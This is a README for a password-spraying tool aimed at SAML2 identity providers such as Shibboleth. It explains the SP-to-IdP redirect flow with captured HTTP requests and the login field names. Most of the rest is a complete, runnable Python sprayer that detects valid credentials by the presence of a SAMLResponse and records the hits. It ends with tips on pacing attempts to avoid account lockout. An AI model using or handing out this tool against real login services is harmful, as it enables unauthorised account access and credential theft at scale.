
SAML2Spray

Python script for password spraying SAML2 authentication against Shibboleth and SAP IdPs.

In a recent pentest I came across the need to password spray a SAML2 authentication. As I couldn't find a ready-to-go solution, nor was I able to do it with Burp, I created my own little script to do the job for me.

TL;DR

The script needs some tweaking to fit your current situation:

  • The URL of the service you want to access
  • The URL of the Identity Provider that the Service Provider redirects you to
  • The parameter names the Identity Provider expects when authenticating
    (all of this can be read from the explanations below)

When ready run it with:

python3 saml2spray.py "path/to/userfile" "password"

You will get a colour-coded response in the shell as well as a file containing all found matches as username:password.

What follows is a short explanation of the workflow of a SAML2 authentication:

  • The user wants to access a service on site A
  • Site A redirects to the Identity Provider on site B
  • The user authenticates to site B, which returns a SAML response and redirects the user back to site A; presenting that SAML response grants access to the desired service

The long story - step by step

Here I will go into a little detail on what the actual process looks like and what you need to take note of.

In order for the script to run, we need to fetch some things beforehand. Burp or a similar intercepting proxy comes in handy here.
I highly recommend that you first do all the steps manually and check what is sent from where to where, and what is expected at the respective endpoints (headers, POST parameters and so on).
Next I recommend running the script through Burp with proxychains, to see where you went wrong ;)

Initial request to the Service Provider at mysite.service:

GET / HTTP/1.1
Host: mysite.service
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
...

The response is a redirect to the Identity Provider at idp.mysite, which will handle the authentication process:

HTTP/1.1 302 Found
date: Thu, 03 Sep 2020 08:27:36 GMT
server: Apache
expires: Wed, 01 Jan 1997 12:00:00 GMT
cache-control: private,no-store,no-cache,max-age=0
location: https://idp.mysite/idp/profile/SAML2/Redirect/SSO?SAMLRequest=hZJdb4IwFIb...

If followed, it will look something like this. This is the actual SAML request: SAMLRequest carries the deflated, base64-encoded AuthnRequest, and SigAlg/Signature are the Service Provider's signature over the query string (HTTP-Redirect binding):

GET /idp/profile/SAML2/Redirect/SSO?SAMLRequest=hZJdb4IwFI...&RelayState=ss%3Am...&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha512&Signature=pBLfAUYBuNM... HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
...
Host: idp.mysite

Now we have to authenticate to the IdP with a username and password. This is also the point where you want to fetch the correct parameter names for username and password, and possibly other parameters that have to be provided for the login to succeed. In this case we have:
j_username
j_password
_eventId_proceed

POST /idp/profile/SAML2/Redirect/SSO?execution=e1s1 HTTP/1.1
Host: idp.mysite
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://idp.mysite/idp/profile/SAML2/Redirect/SSO?execution=e1s1
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: JSESSIONID=ABCDEFGHIJKLMNOP123456789
Connection: close
Upgrade-Insecure-Requests: 1

j_username=test%40test.de&j_password=test&_eventId_proceed=

If we provide wrong credentials we will most likely be redirected to a "wrong username/password" page.
But if we provide correct credentials, we get a SAML response inside an auto-submitting form that posts us back to the service we initially requested. The presence of that SAMLResponse field, not the HTTP status code, is the signal the script keys on.
NOTE: In this scenario Shibboleth was used, but it should work with any SAML2 IdP once the parameter names are adjusted.

HTTP/1.1 200 200
..
set-cookie: shib_idp_session=12345asdaw42qdasdasd; Domain=idp.mysite; Path=/; Secure; HttpOnly
..
<form action="https://mysite.service/Shibboleth.sso/SAML2/POST" method="post">
<input type="hidden" name="RelayState" value="ss:mem:f42430684asd3214325qasdfaysdasd"/>
<input type="hidden" name="SAMLResponse" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c2Ftb
...
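The whole round trip described above (GET the Service Provider, follow the 302 to the IdP login form, POST j_username/j_password/_eventId_proceed with a fresh JSESSIONID, then look for a SAMLResponse hidden field in the answer) as a runnable Python sketch. This is an added example, not the saml2spray script itself: it uses only the standard library, takes the field names from the Shibboleth trace above, and ships with a constructed FakeOpener standing in for the IdP (the csrf_token field, the user list and the "valid" pair alice / Winter2020! are all made up for the demo) so the flow can be exercised offline. It also covers the TL;DR usage: run with a userfile, a password and the service URL.

```python
import sys
import types
import urllib.parse
import urllib.request
from html.parser import HTMLParser
from http.cookiejar import CookieJar

# Field names taken from the Shibboleth login POST shown above; change them for other IdPs.
USER_FIELD, PASS_FIELD = "j_username", "j_password"
EXTRA_FIELDS = {"_eventId_proceed": ""}

class FormParser(HTMLParser):
    """Collect the first <form action> and every hidden <input name=value> on a page."""
    def __init__(self):
        super().__init__()
        self.action, self.hidden = None, {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and self.action is None:
            self.action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.hidden[a["name"]] = a.get("value") or ""

def parse_form(html):
    p = FormParser()
    p.feed(html)
    return p.action, p.hidden

def classify(html):
    """Success: the IdP answered with the auto-submit form carrying SAMLResponse.
    Getting the login form back (with or without an error banner) means rejection."""
    action, hidden = parse_form(html)
    return ("success" if "SAMLResponse" in hidden else "fail"), action

def build_payload(hidden, username, password):
    """Replay the form's hidden fields (CSRF tokens etc.), then add creds and the event id."""
    data = {**hidden, **EXTRA_FIELDS, USER_FIELD: username, PASS_FIELD: password}
    return urllib.parse.urlencode(data).encode()

def new_opener():
    # Fresh cookie jar per attempt: the IdP ties the execution=e1sN state to the JSESSIONID.
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))

def attempt(sp_url, username, password, opener=None):
    """One SP -> IdP -> login round trip. Returns ('success'|'fail', url of the last page)."""
    opener = opener or new_opener()
    r = opener.open(sp_url)                        # urllib follows the 302 to the IdP
    login_url = r.geturl()                         # .../SAML2/Redirect/SSO?execution=e1s1
    action, hidden = parse_form(r.read().decode("utf-8", "replace"))
    post_url = urllib.parse.urljoin(login_url, action)   # the form action is often relative
    r = opener.open(post_url, data=build_payload(hidden, username, password))
    return classify(r.read().decode("utf-8", "replace"))[0], r.geturl()

def spray(users, password, sp_url, opener_factory=new_opener, outfile=None):
    """One password against every user; returns the hits and optionally appends them to a file."""
    hits = []
    for user in users:
        try:
            status, _ = attempt(sp_url, user, password, opener_factory())
        except Exception as exc:                   # HTTP/network error: report and carry on
            print(f"[!] {user}: {exc}")
            continue
        print(("\033[92m" if status == "success" else "\033[91m") + f"[{status}] {user}:{password}\033[0m")
        if status == "success":
            hits.append(f"{user}:{password}")
    if outfile:
        with open(outfile, "a") as fh:
            fh.writelines(h + "\n" for h in hits)
    return hits

# --- constructed stand-in for the IdP so the whole flow can be exercised offline -------
LOGIN_PAGE = ('<form action="?execution=e1s1" method="post">'
              '<input type="hidden" name="csrf_token" value="abc123"></form>')
SAML_PAGE = ('<form action="https://mysite.service/Shibboleth.sso/SAML2/POST" method="post">'
             '<input type="hidden" name="RelayState" value="ss:mem:f424306">'
             '<input type="hidden" name="SAMLResponse" value="PD94bWwgdmVyc2lvbj0i..."></form>')

class FakeOpener:
    """Mimics urllib's opener: every GET lands on the IdP login form; a POST that replays the
    CSRF token with the one assumed valid pair (alice / Winter2020!) yields the SAMLResponse."""
    IDP = "https://idp.mysite/idp/profile/SAML2/Redirect/SSO?execution=e1s1"

    def open(self, url, data=None):
        page = LOGIN_PAGE
        if data is not None:
            f = dict(urllib.parse.parse_qsl(data.decode()))
            ok = f.get("csrf_token") == "abc123" and (f.get(USER_FIELD), f.get(PASS_FIELD)) == ("alice", "Winter2020!")
            page = SAML_PAGE if ok else LOGIN_PAGE + "Wrong username/password"
        return types.SimpleNamespace(read=lambda: page.encode(), geturl=lambda: self.IDP)

if __name__ == "__main__":
    if len(sys.argv) == 4:                         # real run: <userfile> <password> <service-url>
        with open(sys.argv[1]) as fh:
            spray([u.strip() for u in fh if u.strip()], sys.argv[2], sys.argv[3], outfile="found.txt")
    else:                                          # offline demo against the constructed IdP
        spray(["alice", "bob"], "Winter2020!", "https://mysite.service/", FakeOpener)
```

Two design points worth keeping when adapting this to a real target: every attempt gets its own cookie jar, because the Shibboleth execution=e1sN state is bound to the JSESSIONID and reusing one jar across users makes later attempts land on a stale flow; and success is decided by the SAMLResponse hidden field rather than the status code, since the IdP answers 200 for both the error page and the auto-submit form. Keep to one password per run across the whole user list and mind the IdP's lockout threshold between runs.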
